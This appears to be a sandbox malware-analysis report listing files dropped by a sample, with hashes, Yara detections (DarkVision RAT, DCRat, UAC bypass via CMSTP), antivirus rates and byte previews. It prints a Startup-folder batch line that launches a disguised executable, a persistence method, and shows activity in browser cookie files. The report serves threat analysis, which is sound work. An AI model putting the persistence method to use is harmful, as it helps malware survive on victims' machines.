Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1plbnma.wne.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldiq5krr.sfq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lrly4lwp.pij.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4vdij01.eeu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ssmghw13.ifa.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Documents\DBFIEHDHII.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3251712
Entropy (8bit):	6.652379087437616
Encrypted:	false
SSDEEP:	49152:gkhAB1FCb+huU1HjzRmJ1WgxEQBOHOH8wxIXRdGmEyFi:gkhf+huU1DzRmJ132QZUYmEy
MD5:	9B3EF3C58C88279086B777393B2CE36B
SHA1:	26DB0933B6E16EAE12767CD29B4E173B7D0B1D42
SHA-256:	3D4A95B512C8629F9D45145D14133E673B466903C399F54ED6279ADB0BD5E6BC
SHA-512:	088FDDBF009FFF5AF3A86DE4C64AC899F0356E024D1CD78F2AFA5CCF3E88D8F7231E36D951B2E41C1B714ECDB127F59C13C570FF6880CA74331511E20435EBA2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1......H2...@.................................W...k.............................1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...ybivbako..........................@...iccljchg......1......x1.............@....taggant.0....1.."...\|1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\downloaded_file.bin

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	515600
Entropy (8bit):	7.99963177911539
Encrypted:	true
SSDEEP:	12288:QdzOJGhg2nfH8n9/2FZjsOdj81w/U2CPYjqRXNOB:Q9OUO2fYCZY2GdYj4g
MD5:	8D7493DB663BD32F51A5CEA961029033
SHA1:	1DEB3CDCD775919484EC770C7AE0422BDD9C046E
SHA-256:	67B5F51094A8B094886BF57EFD576EDF76049D301525743A74B920F1E4E3F204
SHA-512:	2E56A1FBBFA4AC54B72415ABCF65FE912E89029E2058DBCD6C0B95511A7CBDFC155B859D262D5CD959B5C7027431F5E4CC441EB0ACA60E960959D3EFECC9E0CB
Malicious:	false
Preview:	.....QS.o..(...,&..5.[........1Y........!v6gk..P......_......Pc~..V._Q.(N..j.....i..r.x.{.fX.hy.\q2....&.i..:).e..+..{.g;...?.K..\|6.. .5.........I.RG.[..6..v...:.E..)?......M..`.w....z.[f.C. ..?..o.,....x..k..O.1..6...A......gm..@...I..&...'..X.#X.p..../......F.uZ...dA3.W...Z....o.B..S.9....Y.9...0@}.i..]<?..........;5..\|rL.......H..6....g.s&G./_..\|(\-ys...a.(.F.Ou1....B9nW./a..I....5....~d..,..."_....~..:?M..7.g.r....@..._V...w4[\ZZ.k..k.@...3.K....6.........g..<.I..B...\|3........M....k.{.............:.U<d1>...s3....w.O.X.\.O.n/.f&..D...:sm..y...66\|8W.r.!.d............A.y0._...>.-..(.:/M.R......1.u.5...O.Dq.$...%.&.4/.......:....../,...e.....2a.......FDzN..9.[.^.........m}.e....f....~.....h.`H.'....o.m.\|.>..V..1.....X.=......(u..z....I3Q....p......(.K...{...(..0ga0.;.......m..s..s......vQx .a....P`....b.k...j~Vm.C.0.b...........R....>H...VNL]`..P.V..K..-I..F...xt.....z.89}i( ..l..z.=.....Z(s....L{1..1zQ.O.....*Bb..s.$...

C:\Users\user\AppData\Local\Temp\downloaded_file.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	515584
Entropy (8bit):	6.2318905021613515
Encrypted:	false
SSDEEP:	6144:BRHP4vL3s5+CM6OW0nUBiwCCWfS34mbWMkRONOgbBpiEVBHl8ba2z7rkBiL:BRHP63srM6AbCWfS34mSMkrCpPFBE
MD5:	D60C9E070239F8C240AAA6D8832E11EF
SHA1:	AAAC23A338A91505C56C3057D22A14BF190A2795
SHA-256:	493F1BD7227C4EE9430F8AD226E929908996B97A28F578A850E9B26C393AD2D2
SHA-512:	D70CF79DEC352BD965F8506AD989375642A8931300D5497724C82882AE4D57CCC314D4E6B24C398075AF3DEB4433207522106647E70E74C90E56791E20BCA42C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: ditekSHen
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W...9...9...9.......9..U....9......9......9...8.K.9..U....9..U....9..U....9..U....9..U....9.Rich..9.........................PE..L.....6g............................lb....... ....@..........................P............@....................................d................................/.....................................@............ ...............................text............................... ..`.rdata....... ......................@..@.data....4..........................@....rsrc...............................@..@.reloc...=.......>..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jbrdiqcrtdja.sys

Download File

Process:	C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\juCg2BwLRl

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\mQnuS6LmuW

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nmBhCKFfIP

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\v0IOHcfSj3

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	73
Entropy (8bit):	4.746560909067808
Encrypted:	false
SSDEEP:	3:mKDDFRKn9mbZkRE5ORWRAI0Eyn:hGEi4ORHnEyn
MD5:	1E0342A7A3BD059510E2A01423F8BAD2
SHA1:	3EB5C2B68A7C14A236826851F784567F94AF0003
SHA-256:	ADD6590578FCD418A8C47F5DE9E1D7688B76D9023D4F58B50076DE743F7319B4
SHA-512:	6DA334D45886354CEB1F8C4B622FC3B26021995DF4DA61DAD44F3E4E6F41C3D92FF5450877F8E8F09D83E1FA62A234D7F4AFC28B050077FB9002C4D81DAF5F65
Malicious:	true
Preview:	@echo off..start "" "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe"..

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\XXgM7ZsSvR.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18944
Entropy (8bit):	5.181595394449682
Encrypted:	false
SSDEEP:	384:abquDyuX3PMD1A77ciNqC/Elsrl+0+/QlDIINvB0WLFW:gquuuHPMDinDY9al+0WQFNvBZ
MD5:	F3EDFF85DE5FD002692D54A04BCB1C09
SHA1:	4C844C5B0EE7CB230C9C28290D079143E00CB216
SHA-256:	CAF29650446DB3842E1C1E8E5E1BAFADAF90FC82C5C37B9E2C75A089B7476131
SHA-512:	531D920E2567F58E8169AFC786637C1A0F7B9B5C27B27B5F0EDDBFC3E00CECD7BEA597E34061D836647C5F8C7757F2FE02952A9793344E21B39DDD4BF7985F9D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~@..:!o.:!o.:!o.3Y...!o..Jj.;!o..Jl.9!o..Jk.(!o.:!n.z!o..Jn.9!o..Jg.8!o..J..;!o..Jm.;!o.Rich:!o.........PE..d...h.6;.........."......"...*.......(.........@.....................................`....`.......... .......................................H...............p.................. ...`D..T............................@..............(A...............................text...0 .......".................. ..`.rdata..~....@.......&..............@..@.data........`.......<..............@....pdata.......p.......>..............@..@.rsrc................@..............@..@.reloc.. ............H..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1709568
Entropy (8bit):	4.871474066048546
Encrypted:	false
SSDEEP:	24576:2YCGLO9L8YXprwCw7lTxvvNlm5hK+iYBKUOzXQAY671:3CGq9pXprWu/XhtA
MD5:	579FD24F4CACC972F63F47214F9C3C34
SHA1:	20BE9C6E9AA29D57B670D6809FFAD1786A8508E5
SHA-256:	F80BD8EB42194DF565E3152D35BAD6A40FDAE70E221E9E66873587BFFB73D64B
SHA-512:	1A8F7918B931FA10CBC4B47A88405C0B28255360AC27E1D44BA00554186ED20139FBAAA278A362C34A20083F4FFF30DC83876C3F382397F831F781FB6A9AAB91
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."..................-... ...@....@.. ..............................K.....@..................................,..K....@..p....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................-......H...........@[..........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\BVPoHZLO.log

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CFNWwRDq.log

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DBkeOEgG.log

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FwENDODk.log

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IwlvVjWA.log

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
